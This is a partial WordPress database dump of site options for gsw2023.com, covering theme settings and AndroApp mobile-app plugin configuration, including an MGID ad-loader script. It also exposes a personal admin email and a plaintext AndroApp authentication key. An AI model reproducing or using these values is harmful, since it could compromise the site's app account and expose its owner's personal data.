2:\"10\";s:41:\"stripes-stripe_2_content_boxes_decoration\";s:4:\"none\";s:55:\"stripes-stripe_2_content_boxes_decoration_outline_color\";s:7:\"#ffffff\";s:57:\"stripes-stripe_2_content_boxes_decoration_outline_opacity\";s:2:\"15\";s:30:\"stripes-stripe_2_headers_color\";s:7:\"#ffffff\";s:24:\"stripes-stripe_2_outline\";s:4:\"hide\";s:30:\"stripes-stripe_2_outline_color\";s:7:\"#ffffff\";s:32:\"stripes-stripe_2_outline_opacity\";s:2:\"15\";s:27:\"stripes-stripe_2_text_color\";s:7:\"#8b9199\";s:25:\"stripes-stripe_3_bg_image\";a:4:{s:5:\"image\";s:88:\"/wp-content/uploads-landing/inc/presets/images/full/skin22.stripes-stripe-3-bg-image.jpg\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:22:\"stripes-stripe_3_color\";s:7:\"#000000\";s:39:\"stripes-stripe_3_content_boxes_bg_color\";s:7:\"#ffffff\";s:41:\"stripes-stripe_3_content_boxes_bg_opacity\";s:2:\"10\";s:41:\"stripes-stripe_3_content_boxes_decoration\";s:4:\"none\";s:55:\"stripes-stripe_3_content_boxes_decoration_outline_color\";s:7:\"#ffffff\";s:57:\"stripes-stripe_3_content_boxes_decoration_outline_opacity\";s:2:\"19\";s:30:\"stripes-stripe_3_headers_color\";s:7:\"#ffffff\";s:24:\"stripes-stripe_3_outline\";s:4:\"hide\";s:30:\"stripes-stripe_3_outline_color\";s:7:\"#252728\";s:32:\"stripes-stripe_3_outline_opacity\";s:3:\"100\";s:27:\"stripes-stripe_3_text_color\";s:7:\"#ffffff\";s:20:\"template_page_id_404\";i:0;s:23:\"template_page_id_author\";i:0;s:36:\"template_page_id_author_full_content\";s:1:\"0\";s:30:\"template_page_id_blog_category\";i:0;s:43:\"template_page_id_blog_category_full_content\";s:1:\"0\";s:26:\"template_page_id_blog_tags\";i:0;s:39:\"template_page_id_blog_tags_full_content\";s:1:\"0\";s:21:\"template_page_id_date\";i:0;s:34:\"template_page_id_date_full_content\";s:1:\"0\";s:23:\"template_page_id_search\";i:0;s:36:\"template_page_id_search_full_content\";s:1:\"0\";s:19:\"the7_opengraph_tags\";s:1:\"1\";s:14:\"top-bar-height\";s:3:\"0px\";s:28:\"top-bar-transparent_bg_color\";s:15:\"rgba(0,0,0,0.5)\";s:16:\"top_bar-bg-color\";s:16:\"rgba(35,38,45,0)\";s:16:\"top_bar-bg-image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:16:\"top_bar-bg-style\";s:14:\"fullwidth_line\";s:25:\"top_bar-custom-icon-color\";s:0:\"\";s:24:\"top_bar-custom-icon-size\";s:2:\"16\";s:18:\"top_bar-font-color\";s:7:\"#adb0b6\";s:18:\"top_bar-line-color\";s:21:\"rgba(173,176,182,0.3)\";s:34:\"top_bar-line-in-transparent-header\";b:0;s:17:\"top_bar-line_size\";s:3:\"1px\";s:18:\"top_bar-line_style\";s:5:\"solid\";s:15:\"top_bar-padding\";s:15:\"5px 0px 5px 0px\";s:23:\"top_bar-switch_paddings\";s:3:\"0px\";s:18:\"top_bar-typography\";a:3:{s:11:\"font_family\";s:10:\"Roboto:500\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"13\";}s:23:\"top_bar_mobile_paddings\";s:17:\"5px 20px 5px 20px\";s:10:\"widget_gap\";s:4:\"20px\";s:11:\"widgetareas\";a:2:{i:1;a:2:{s:12:\"sidebar_name\";s:15:\"Default Sidebar\";s:12:\"sidebar_desc\";s:27:\"Sidebar primary widget area\";}i:2;a:2:{s:12:\"sidebar_name\";s:14:\"Default Footer\";s:12:\"sidebar_desc\";s:26:\"Footer primary widget area\";}}}}s:38:\"ultimate_imported_google_font_families\";a:1:{i:0;s:7:\"Raleway\";}}}','no'),
(829,'wp_calendar_block_has_published_posts','1','yes'),
(848,'the7_fontawesome_enabled','fa5','yes'),
(1376,'the7_options_view_mode','backend','yes'),
(1382,'widget_presscore-team','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(1515,'rs_image_meta_todo','a:0:{}','yes'),
(1517,'smile_fonts','a:1:{s:25:\"icomoon-fontawesome-16x16\";a:4:{s:7:\"include\";s:37:\"smile_fonts/icomoon-fontawesome-16x16\";s:6:\"folder\";s:37:\"smile_fonts/icomoon-fontawesome-16x16\";s:5:\"style\";s:55:\"icomoon-fontawesome-16x16/icomoon-fontawesome-16x16.css\";s:6:\"config\";s:11:\"charmap.php\";}}','yes'),
(1991,'revslider_update_revision_current','6.4.10','yes'),
(2592,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:1:{i:0;i:5;}}','yes'),
(2695,'revslider-update-check','1693823970','yes'),
(2696,'revslider_update_info','O:8:\"stdClass\":0:{}','yes'),
(3339,'WPLANG','','yes'),
(3340,'new_admin_email','ay.zaghweb@gmail.com','yes'),
(3945,'_transient_health-check-site-status-result','{\"good\":15,\"recommended\":9,\"critical\":1}','yes'),
(5559,'elementor_library_category_children','a:0:{}','yes'),
(5668,'duplicate_post_show_notice','0','no'),
(5669,'duplicate_post_copytitle','1','yes'),
(5670,'duplicate_post_copydate','0','yes'),
(5671,'duplicate_post_copystatus','0','yes'),
(5672,'duplicate_post_copyslug','0','yes'),
(5673,'duplicate_post_copyexcerpt','1','yes'),
(5674,'duplicate_post_copycontent','1','yes'),
(5675,'duplicate_post_copythumbnail','1','yes'),
(5676,'duplicate_post_copytemplate','1','yes'),
(5677,'duplicate_post_copyformat','1','yes'),
(5678,'duplicate_post_copyauthor','0','yes'),
(5679,'duplicate_post_copypassword','0','yes'),
(5680,'duplicate_post_copyattachments','0','yes'),
(5681,'duplicate_post_copychildren','0','yes'),
(5682,'duplicate_post_copycomments','0','yes'),
(5683,'duplicate_post_copymenuorder','1','yes'),
(5684,'duplicate_post_taxonomies_blacklist','a:0:{}','yes'),
(5685,'duplicate_post_blacklist','','yes'),
(5686,'duplicate_post_types_enabled','a:2:{i:0;s:4:\"post\";i:1;s:4:\"page\";}','yes'),
(5687,'duplicate_post_show_original_column','0','yes'),
(5688,'duplicate_post_show_original_in_post_states','0','yes'),
(5689,'duplicate_post_show_original_meta_box','0','yes'),
(5690,'duplicate_post_show_link','a:3:{s:9:\"new_draft\";s:1:\"1\";s:5:\"clone\";s:1:\"1\";s:17:\"rewrite_republish\";s:1:\"1\";}','yes'),
(5691,'duplicate_post_show_link_in','a:4:{s:3:\"row\";s:1:\"1\";s:8:\"adminbar\";s:1:\"1\";s:9:\"submitbox\";s:1:\"1\";s:11:\"bulkactions\";s:1:\"1\";}','yes'),
(5692,'duplicate_post_version','4.5','yes'),
(5819,'_elementor_global_css','a:6:{s:4:\"time\";i:1665108159;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;b:0;}','yes'),
(6550,'elementor_log','a:1:{s:32:\"2bf6646719e8374d7df1cb9807e97e66\";O:30:\"Elementor\\Core\\Logger\\Items\\JS\":10:{s:9:\"\0*\0column\";s:5:\"31703\";s:7:\"\0*\0file\";s:65:\"https://gsw2023.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0\";s:7:\"\0*\0line\";s:1:\"2\";s:7:\"\0*\0date\";s:19:\"2022-10-07 21:06:22\";s:7:\"\0*\0type\";s:5:\"error\";s:10:\"\0*\0message\";s:31:\"the7ApplyColumns is not defined\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-10-07 21:06:22\";}s:7:\"\0*\0args\";a:6:{s:4:\"type\";s:5:\"error\";s:9:\"timestamp\";s:10:\"1665176782\";s:7:\"message\";s:31:\"the7ApplyColumns is not defined\";s:3:\"url\";s:65:\"https://gsw2023.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0\";s:4:\"line\";s:1:\"2\";s:6:\"column\";s:5:\"31703\";}}}','no'),
(7749,'the7_core_post_types','a:2:{s:12:\"dt_portfolio\";a:7:{s:5:\"label\";s:9:\"Workshops\";s:14:\"singular_label\";s:9:\"Workshops\";s:16:\"delete_with_user\";s:1:\"1\";s:19:\"exclude_from_search\";s:1:\"1\";s:17:\"rewrite_withfront\";s:1:\"1\";s:6:\"labels\";a:0:{}s:4:\"name\";s:12:\"dt_portfolio\";}s:7:\"dt_team\";a:5:{s:16:\"delete_with_user\";s:1:\"1\";s:19:\"exclude_from_search\";s:1:\"1\";s:17:\"rewrite_withfront\";s:1:\"1\";s:6:\"labels\";a:0:{}s:4:\"name\";s:7:\"dt_team\";}}','yes'),
(7750,'the7_core_taxonomies','a:2:{s:21:\"dt_portfolio_category\";a:3:{s:12:\"rewrite_slug\";s:18:\"workshops-category\";s:6:\"labels\";a:0:{}s:4:\"name\";s:21:\"dt_portfolio_category\";}s:17:\"dt_portfolio_tags\";a:3:{s:12:\"rewrite_slug\";s:13:\"workshops-tag\";s:6:\"labels\";a:0:{}s:4:\"name\";s:17:\"dt_portfolio_tags\";}}','yes'),
(19015,'pw_androapp_version','2100','yes'),
(19016,'pwapp_db_version','1.0.4','yes'),
(19017,'pw-mobile-app','a:34:{s:8:\"app_menu\";s:1:\"5\";s:11:\"slider_menu\";s:1:\"5\";s:15:\"image_dimension\";s:7:\"preview\";s:18:\"excerpt_preference\";s:4:\"none\";s:25:\"androapp_selected_Scripts\";s:530:\"dt-main\r\ncontact-form-7\r\ngw-tweenmax\r\ngo-pricing-scripts\r\njquery-core\r\njquery-migrate\r\ntp-tools\r\nrevmin\r\ngive\r\ngive-donation-summary-script-frontend\r\ndt-above-fold\r\ndt-legacy\r\nthe7-custom-scrollbar\r\nthe7-core\r\nultimate-vc-addons-params\r\nultimate-vc-addons-appear\r\nultimate-vc-addons-custom\r\nultimate-vc-addons-info_box_js\r\nswv\r\nregenerator-runtime\r\nwp-polyfill\r\nwp-hooks\r\nwp-i18n\r\njquery-mousewheel\r\nwpb_composer_front_js\r\nlightbox2\r\nvc_masonry\r\nvc_pageable_owl-carousel\r\nvc_grid-js-imagesloaded\r\nunderscore\r\nvc_waypoints\r\nvc_grid\";s:26:\"androapp_postprocessed_css\";s:422:\"androapp img{\r\n    max-width: 100%;\r\n    height: auto;\r\n}\r\niframe{\r\n    max-width: 100%;    \r\n}\r\nfigure {\r\n    max-width: 100%;\r\n    height: auto;\r\n}\r\nimg{\r\n    max-width: 100% !important;\r\n    height: auto;\r\n}\r\ndiv {\r\n    max-width: 100% !important;\r\n}\r\nspan {\r\n    max-width:100%;\r\n    overflow: auto;\r\n}\r\naudio {\r\n    display:block;\r\n    visibility:visible !important;\r\n}\r\nvideo{\r\n    width:100%;\r\n    height:auto;\r\n}\r\n\";s:12:\"androapp_css\";s:133:\"#menu-header-menu{\r\n	display:none;\r\n}																																																																																																\";s:12:\"post_content\";s:10:\"loadimages\";s:21:\"failover_post_content\";s:13:\"postprocessed\";s:15:\"loadurl_postids\";s:21:\"https://gsw2023.com/#\";s:20:\"preprocessed_postids\";s:0:\"\";s:21:\"postprocessed_postids\";s:0:\"\";s:18:\"loadimages_postids\";s:0:\"\";s:23:\"featured_image_showhide\";s:4:\"show\";s:22:\"share_image_preference\";s:5:\"first\";s:16:\"share_preference\";s:7:\"EXCERPT\";s:30:\"share_textwithimage_preference\";s:5:\"TITLE\";s:17:\"share_suffix_test\";s:3:\"via\";s:17:\"share_suffix_link\";s:4:\"POST\";s:19:\"share_function_name\";s:0:\"\";s:32:\"share_image_with_custom_function\";s:1:\"1\";s:15:\"cache_json_apis\";s:1:\"1\";s:17:\"comments_provider\";s:8:\"disabled\";s:15:\"homepage_widget\";s:5:\"pages\";s:18:\"homepage_post_type\";s:4:\"page\";s:16:\"homepage_post_id\";s:6:\"1/home\";s:19:\"enable_offline_save\";s:1:\"1\";s:18:\"show_settings_menu\";s:1:\"1\";s:12:\"npa_settings\";s:1:\"1\";s:27:\"push_notifications_settings\";s:1:\"1\";s:18:\"font_size_settings\";s:1:\"1\";s:17:\"default_font_size\";s:1:\"1\";s:18:\"regex_open_browser\";s:52:\" https://puzzlersworld.com.*|https://shipmycard.com*\";s:18:\"regex_open_webview\";s:52:\" https://puzzlersworld.com.*|https://shipmycard.com*\";}','yes'),
(19018,'pw-mobile-build-options','a:35:{s:14:\"androapp_theme\";s:8:\"cardview\";s:16:\"statusBarBgColor\";s:7:\"#3209ec\";s:16:\"actionBarBgColor\";s:7:\"#311b92\";s:19:\"actionBarTitleColor\";s:7:\"#ffffff\";s:13:\"screenBgColor\";s:7:\"#e6e6e6\";s:14:\"feedTitleColor\";s:7:\"#424242\";s:20:\"feedContentTextColor\";s:7:\"#616161\";s:11:\"feedBgColor\";s:7:\"#ffffff\";s:12:\"tagTextColor\";s:7:\"#000000\";s:10:\"tagBgColor\";s:7:\"#e6e6e6\";s:15:\"authorTextColor\";s:7:\"#000000\";s:13:\"timeTextColor\";s:7:\"#000000\";s:8:\"app_name\";s:7:\"GSW2023\";s:13:\"app_host_name\";s:19:\"https://gsw2023.com\";s:18:\"androapp_font_name\";s:0:\"\";s:16:\"app_deep_linking\";s:0:\"\";s:16:\"google_sender_id\";s:0:\"\";s:21:\"analytics_tracking_id\";s:0:\"\";s:25:\"ios_analytics_tracking_id\";s:0:\"\";s:13:\"google_app_id\";s:0:\"\";s:20:\"google_services_json\";s:0:\"\";s:29:\"androapp_admob_application_id\";s:0:\"\";s:10:\"ios_app_id\";s:0:\"\";s:18:\"authentication_key\";s:64:\"bqfo3fs0mildhw351o0aft9klxn4apntbnhhxqxyaf2rkpfcwlzixgcnlj7nfy4g\";s:9:\"client_id\";s:5:\"41011\";s:21:\"androapp_renewal_date\";s:10:\"1668286413\";s:19:\"androapp_plugin_url\";s:38:\"https://gsw2023.com/wp-content/plugins\";s:12:\"package_name\";s:28:\"mobi.androapp.agsw2023.c8285\";s:13:\"launcher_icon\";s:85:\"http://androapp.mobi/appCreator/uploads/2022/10//38461152863488d633d9629.71119672.png\";s:17:\"notification_icon\";s:86:\"http://androapp.mobi/appCreator/noticons/2022/10//40784671363488d694eed46.38561754.png\";s:11:\"splashImage\";s:84:\"http://androapp.mobi/appCreator/splash/2022/10//17581851563488d6fc76d72.36765146.png\";s:13:\"category_base\";s:0:\"\";s:8:\"tag_base\";s:0:\"\";s:12:\"build_source\";s:10:\"getyourapp\";s:5:\"email\";s:20:\"ay.zaghweb@gmail.com\";}','yes'),
(19019,'androapp_account_settings','a:33:{s:29:\"androapp_firebase_api_version\";s:2:\"v0\";s:11:\"gcm_api_key\";s:45:\"1:674795666922:android:d641bbf6ce54cf1def0693\";s:43:\"androapp_firebase_service_account_file_path\";s:0:\"\";s:20:\"google_services_json\";s:0:\"\";s:33:\"notification-custom-post-typepost\";s:1:\"1\";s:33:\"notification-custom-post-typepage\";s:1:\"1\";s:39:\"notification-custom-post-typegive_forms\";s:1:\"1\";s:41:\"notification-custom-post-typedt_portfolio\";s:1:\"1\";s:36:\"notification-custom-post-typedt_team\";s:1:\"1\";s:20:\"push_stack_thershold\";s:1:\"5\";s:21:\"analytics_tracking_id\";s:0:\"\";s:29:\"androapp_admob_application_id\";s:0:\"\";s:17:\"mopub_top_ad_unit\";s:0:\"\";s:11:\"top_ad_unit\";s:0:\"\";s:10:\"top_ad_ype\";s:6:\"BANNER\";s:19:\"top_appnext_ad_unit\";s:0:\"\";s:19:\"top__appnext_ad_ype\";s:6:\"BANNER\";s:20:\"mopub_middle_ad_unit\";s:0:\"\";s:12:\"list_ad_unit\";s:0:\"\";s:17:\"list_ad_unit_type\";s:6:\"BANNER\";s:20:\"list_appnext_ad_unit\";s:0:\"\";s:25:\"list_appnext_ad_unit_type\";s:6:\"BANNER\";s:17:\"list_ad_unit_freq\";s:1:\"5\";s:20:\"mopub_bottom_ad_unit\";s:0:\"\";s:14:\"bottom_ad_unit\";s:0:\"\";s:13:\"bottom_ad_ype\";s:6:\"BANNER\";s:22:\"bottom_appnext_ad_unit\";s:0:\"\";s:21:\"bottom_appnext_ad_ype\";s:6:\"BANNER\";s:26:\"mopub_interstitial_ad_unit\";s:0:\"\";s:28:\"appnext_interstitial_ad_unit\";s:0:\"\";s:28:\"appnext_interstitial_ad_type\";s:18:\"INTERSTITIAL_VIDEO\";s:20:\"interstitial_ad_unit\";s:0:\"\";s:25:\"interstitial_ad_unit_freq\";s:1:\"3\";}','yes'),
(19020,'androapp_post_content_tab','a:3:{s:22:\"androapp_header_script\";s:0:\"\";s:28:\"androapp_before_post_content\";s:0:\"\";s:27:\"androapp_after_post_content\";s:0:\"\";}','yes'),
(19021,'pw-mobile-app-language','a:112:{s:4:\"HOME\";s:4:\"Home\";s:6:\"SELECT\";s:9:\"Select...\";s:15:\"SELECT_CATEGORY\";s:15:\"Select Category\";s:12:\"CANT_CONNECT\";s:13:\"Can\'t Connect\";s:5:\"RETRY\";s:12:\"Tap to Retry\";s:18:\"CONNECTION_TIMEOUT\";s:18:\"Connection Timeout\";s:13:\"UNKNOWN_ERROR\";s:13:\"Unknown Error\";s:7:\"LOADING\";s:10:\"Loading...\";s:11:\"SHARE_TITLE\";s:29:\"Hey, I found this interesting\";s:8:\"NEW_POST\";s:8:\"New Post\";s:9:\"NEW_POSTS\";s:9:\"new posts\";s:4:\"YEAR\";s:4:\"year\";s:5:\"MONTH\";s:5:\"month\";s:3:\"DAY\";s:3:\"day\";s:4:\"HOUR\";s:4:\"hour\";s:6:\"MINUTE\";s:6:\"minute\";s:6:\"SECOND\";s:6:\"second\";s:5:\"YEARS\";s:5:\"years\";s:6:\"MONTHS\";s:6:\"months\";s:4:\"DAYS\";s:4:\"days\";s:5:\"HOURS\";s:5:\"hours\";s:7:\"MINUTES\";s:7:\"minutes\";s:7:\"SECONDS\";s:7:\"seconds\";s:3:\"AGO\";s:3:\"ago\";s:2:\"BY\";s:2:\"by\";s:2:\"IN\";s:2:\"in\";s:11:\"NO_COMMENTS\";s:44:\"No comments yet, Be the first one to comment\";s:14:\"COMMENTS_TITLE\";s:8:\"COMMENTS\";s:13:\"COMMENT_EMPTY\";s:22:\"Comment field is Empty\";s:13:\"PROVIDE_EMAIL\";s:42:\"Please provide your name and email address\";s:15:\"SENDING_COMMENT\";s:18:\"Sending Comment...\";s:19:\"AWAITING_MODERATION\";s:19:\"Awaiting Moderation\";s:12:\"TYPE_MESSAGE\";s:12:\"Type Message\";s:18:\"TYPE_REPLY_MESSAGE\";s:18:\"Type Reply Message\";s:16:\"COMMENT_SETTINGS\";s:17:\"Comments Settings\";s:4:\"NAME\";s:4:\"Name\";s:5:\"EMAIL\";s:5:\"Email\";s:11:\"EMAIL_EMPTY\";s:20:\"Email can\'t be Empty\";s:11:\"VALID_EMAIL\";s:34:\"Please enter a valid email address\";s:19:\"ATLEAST_THREE_CHARS\";s:41:\"Please enter atleast 3 characters in name\";s:10:\"VALID_NAME\";s:19:\"Name can\'t be Empty\";s:6:\"SUBMIT\";s:6:\"Submit\";s:11:\"SEARCH_HINT\";s:12:\"Search Posts\";s:19:\"EMPTY_SEARCH_RESULT\";s:39:\"Sorry, no content matched your criteria\";s:13:\"OFFLINE_POSTS\";s:11:\"Saved Posts\";s:16:\"SAVE_FOR_OFFLINE\";s:12:\"Save Offline\";s:19:\"REMOVE_FROM_OFFLINE\";s:24:\"Remove from Offline Save\";s:17:\"PERMISSION_NEEDED\";s:17:\"Permission Needed\";s:8:\"SETTINGS\";s:8:\"Settings\";s:16:\"PERSONALIZED_ADS\";s:16:\"Personalized Ads\";s:9:\"FONT_SIZE\";s:9:\"Font Size\";s:7:\"DEFAULT\";s:7:\"Default\";s:5:\"SMALL\";s:5:\"Small\";s:6:\"MEDIUM\";s:6:\"Medium\";s:5:\"LARGE\";s:5:\"Large\";s:18:\"PUSH_NOTIFICATIONS\";s:18:\"Push Notifications\";s:12:\"wooseparator\";s:12:\"wooseparator\";s:19:\"PRODUCT_DESCRIPTION\";s:11:\"Description\";s:4:\"CART\";s:4:\"Cart\";s:8:\"CHECKOUT\";s:8:\"Checkout\";s:17:\"ADD_TO_CART_ERROR\";s:24:\"Could not update cart !!\";s:5:\"LOGIN\";s:5:\"Login\";s:8:\"USERNAME\";s:8:\"Username\";s:8:\"PASSWORD\";s:8:\"Password\";s:10:\"REPASSWORD\";s:16:\"Re Type Password\";s:13:\"CANT_BE_EMPTY\";s:14:\"Can\'t be EMpty\";s:16:\"SHIPPING_ADDRESS\";s:16:\"Shipping Address\";s:15:\"BILLING_ADDRESS\";s:15:\"Billing Address\";s:10:\"FIRST_NAME\";s:10:\"First Name\";s:9:\"LAST_NAME\";s:9:\"Last Name\";s:4:\"CITY\";s:4:\"City\";s:5:\"STATE\";s:5:\"State\";s:7:\"COUNTRY\";s:7:\"Country\";s:7:\"PINCODE\";s:7:\"Pincode\";s:8:\"ADDRESS1\";s:9:\"Address 1\";s:8:\"ADDRESS2\";s:9:\"Address 2\";s:5:\"PHONE\";s:5:\"Phone\";s:20:\"PASSWORDS_DONT_MATCH\";s:21:\"Password do not match\";s:17:\"ENTER_COUPON_CODE\";s:17:\"Enter Coupon Code\";s:12:\"APPLY_COUPON\";s:12:\"Apply Coupon\";s:8:\"SUBTOTAL\";s:8:\"Subtotal\";s:5:\"TAXES\";s:5:\"Taxes\";s:21:\"SHIPPING_AND_HANDLING\";s:21:\"Shipping And Handling\";s:5:\"TOTAL\";s:5:\"Total\";s:8:\"Discount\";s:8:\"Discount\";s:4:\"NEXT\";s:4:\"Next\";s:4:\"BACK\";s:4:\"Back\";s:10:\"ORDER_NOTE\";s:10:\"Order Note\";s:15:\"SHIPPING_METHOD\";s:15:\"Shipping Method\";s:12:\"ORDER_REVIEW\";s:12:\"Order Review\";s:14:\"ORDER_COMPLETE\";s:12:\"Order Status\";s:14:\"PAYMENT_METHOD\";s:14:\"Payment Method\";s:5:\"ORDER\";s:5:\"Order\";s:12:\"ORDER_STATUS\";s:12:\"Order Status\";s:10:\"LOGGED_OUT\";s:22:\"You are now logged out\";s:10:\"CART_EMPTY\";s:10:\"Cart Empty\";s:15:\"BROWSE_PRODUCTS\";s:15:\"Browse Products\";s:13:\"ADDED_TO_CART\";s:13:\"Added to cart\";s:6:\"COUPON\";s:6:\"Coupon\";s:7:\"APPLIED\";s:7:\"Applied\";s:3:\"MRP\";s:3:\"MRP\";s:7:\"BUY_NOW\";s:7:\"BUY NOW\";s:12:\"OUT_OF_STOCK\";s:12:\"Out Of Stock\";s:8:\"REGISTER\";s:8:\"Register\";s:25:\"PRODUCT_ADD_TO_CART_ERROR\";s:32:\"Product can not be added to cart\";s:18:\"COUPON_APPLY_ERROR\";s:25:\"Coupon can not be applied\";s:6:\"VENDOR\";s:6:\"Vendor\";s:16:\"NOT_ENOUGH_STOCK\";s:23:\"Sorry, Not enough stock\";s:23:\"SAME_AS_BILLING_ADDRESS\";s:23:\"Same as Billing Address\";s:15:\"UPDATE_QUANTITY\";s:15:\"Update Quantity\";s:12:\"CART_UPDATED\";s:12:\"Cart Updated\";s:24:\"QUANTITY_TEXT_VALIDATION\";s:21:\"Please enter a number\";}','yes'),
(19022,'androapp_scripts_detected','a:2:{s:5:\"count\";i:5;s:7:\"scripts\";a:42:{s:7:\"dt-main\";s:60:\"https://gsw2023.com/wp-content/themes/dt-the7/js/main.min.js\";s:14:\"contact-form-7\";s:74:\"https://gsw2023.com/wp-content/plugins/contact-form-7/includes/js/index.js\";s:11:\"gw-tweenmax\";s:66:\"https://cdnjs.cloudflare.com/ajax/libs/gsap/1.11.2/TweenMax.min.js\";s:18:\"go-pricing-scripts\";s:81:\"https://gsw2023.com/wp-content/plugins/go_pricing/assets/js/go_pricing_scripts.js\";s:11:\"jquery-core\";s:55:\"https://gsw2023.com/wp-includes/js/jquery/jquery.min.js\";s:14:\"jquery-migrate\";s:63:\"https://gsw2023.com/wp-includes/js/jquery/jquery-migrate.min.js\";s:8:\"tp-tools\";s:80:\"https://gsw2023.com/wp-content/plugins/revslider/public/assets/js/rbtools.min.js\";s:6:\"revmin\";s:76:\"https://gsw2023.com/wp-content/plugins/revslider/public/assets/js/rs6.min.js\";s:4:\"give\";s:66:\"https://gsw2023.com/wp-content/plugins/give/assets/dist/js/give.js\";s:37:\"give-donation-summary-script-frontend\";s:83:\"https://gsw2023.com/wp-content/plugins/give/assets/dist/js/give-donation-summary.js\";s:13:\"dt-above-fold\";s:70:\"https://gsw2023.com/wp-content/themes/dt-the7/js/above-the-fold.min.js\";s:9:\"dt-legacy\";s:62:\"https://gsw2023.com/wp-content/themes/dt-the7/js/legacy.min.js\";s:21:\"the7-custom-scrollbar\";s:90:\"https://gsw2023.com/wp-content/themes/dt-the7/lib/custom-scrollbar/custom-scrollbar.min.js\";s:9:\"the7-core\";s:78:\"https://gsw2023.com/wp-content/plugins/dt-the7-core/assets/js/post-type.min.js\";s:3:\"swv\";s:78:\"https://gsw2023.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js\";s:19:\"regenerator-runtime\";s:73:\"https://gsw2023.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js\";s:11:\"wp-polyfill\";s:65:\"https://gsw2023.com/wp-includes/js/dist/vendor/wp-polyfill.min.js\";s:8:\"wp-hooks\";s:52:\"https://gsw2023.com/wp-includes/js/dist/hooks.min.js\";s:7:\"wp-i18n\";s:51:\"https://gsw2023.com/wp-includes/js/dist/i18n.min.js\";s:17:\"jquery-mousewheel\";s:92:\"https://gsw2023.com/wp-content/themes/dt-the7/lib/jquery-mousewheel/jquery-mousewheel.min.js\";s:9:\"admin-bar\";s:51:\"https://gsw2023.com/wp-includes/js/admin-bar.min.js\";s:10:\"wp-pointer\";s:52:\"https://gsw2023.com/wp-includes/js/wp-pointer.min.js\";s:33:\"ultimate-vc-addons-jquery.dualbtn\";s:90:\"https://gsw2023.com/wp-content/plugins/Ultimate_VC_Addons/assets/min-js/dual-button.min.js\";s:14:\"jquery-ui-tabs\";s:56:\"https://gsw2023.com/wp-includes/js/jquery/ui/tabs.min.js\";s:18:\"jquery-ui-sortable\";s:60:\"https://gsw2023.com/wp-includes/js/jquery/ui/sortable.min.js\";s:19:\"jquery-ui-droppable\";s:61:\"https://gsw2023.com/wp-includes/js/jquery/ui/droppable.min.js\";s:19:\"jquery-ui-draggable\";s:61:\"https://gsw2023.com/wp-includes/js/jquery/ui/draggable.min.js\";s:19:\"jquery-ui-accordion\";s:61:\"https://gsw2023.com/wp-includes/js/jquery/ui/accordion.min.js\";s:22:\"jquery-ui-autocomplete\";s:64:\"https://gsw2023.com/wp-includes/js/jquery/ui/autocomplete.min.js\";s:21:\"wpb_composer_front_js\";s:90:\"https://gsw2023.com/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js\";s:12:\"vc_waypoints\";s:94:\"https://gsw2023.com/wp-content/plugins/js_composer/assets/lib/vc_waypoints/vc-waypoints.min.js\";s:15:\"wpb_scrollTo_js\";s:99:\"https://gsw2023.com/wp-content/plugins/js_composer/assets/lib/bower/scrollTo/jquery.scrollTo.min.js\";s:10:\"wpb_php_js\";s:92:\"https://gsw2023.com/wp-content/plugins/js_composer/assets/lib/php.default/php.default.min.js\";s:19:\"vc_inline_iframe_js\";s:86:\"https://gsw2023.com/wp-content/plugins/js_composer/assets/js/dist/page_editable.min.js\";s:21:\"the7-vc-inline-editor\";s:83:\"https://gsw2023.com/wp-content/themes/dt-the7/inc/shortcodes/js/vc-inline-editor.js\";s:14:\"hoverintent-js\";s:56:\"https://gsw2023.com/wp-includes/js/hoverintent-js.min.js\";s:14:\"jquery-ui-core\";s:56:\"https://gsw2023.com/wp-includes/js/jquery/ui/core.min.js\";s:15:\"jquery-ui-mouse\";s:57:\"https://gsw2023.com/wp-includes/js/jquery/ui/mouse.min.js\";s:14:\"jquery-ui-menu\";s:56:\"https://gsw2023.com/wp-includes/js/jquery/ui/menu.min.js\";s:12:\"wp-dom-ready\";s:56:\"https://gsw2023.com/wp-includes/js/dist/dom-ready.min.js\";s:7:\"wp-a11y\";s:51:\"https://gsw2023.com/wp-includes/js/dist/a11y.min.js\";s:10:\"underscore\";s:52:\"https://gsw2023.com/wp-includes/js/underscore.min.js\";}}','yes'),
(19023,'androapp_ads','a:3:{s:15:\"androapp_header\";s:0:\"\";s:6:\"top_ad\";s:0:\"\";s:9:\"bottom_ad\";s:922:\"<!-- AndroApp Start -->\r\n<div id=\"M182532ScriptRootC61716\">\r\n    <div id=\"M182532PreloadC61716\">\r\n        Loading...\r\n    </div>\r\n    <script>\r\n                (function(){\r\n            var D=new Date(),d=document,b=\'body\',ce=\'createElement\',ac=\'appendChild\',st=\'style\',ds=\'display\',n=\'none\',gi=\'getElementById\';\r\n            var i=d[ce](\'iframe\');i[st][ds]=n;d[gi](\"M182532ScriptRootC61716\")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln(\"<ht\"+\"ml><bo\"+\"dy></bo\"+\"dy></ht\"+\"ml>\");iw.close();var c=iw[b];}\r\n            catch(e){var iw=d;var c=d[gi](\"M182532ScriptRootC61716\");}var dv=iw[ce](\'div\');dv.id=\"MG_ID\";dv[st][ds]=n;dv.innerHTML=61716;c[ac](dv);\r\n            var s=iw[ce](\'script\');s.async=\'async\';s.defer=\'defer\';s.charset=\'utf-8\';s.src=\"//jsc.mgid.com/a/n/androapp.mobi.61716.js?t=\"+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();\r\n    </script>\r\n</div>\r\n<!-- AndroApp End -->\";}','yes'),
(19698,'recovery_mode_email_last_sent','1693078339','yes'),
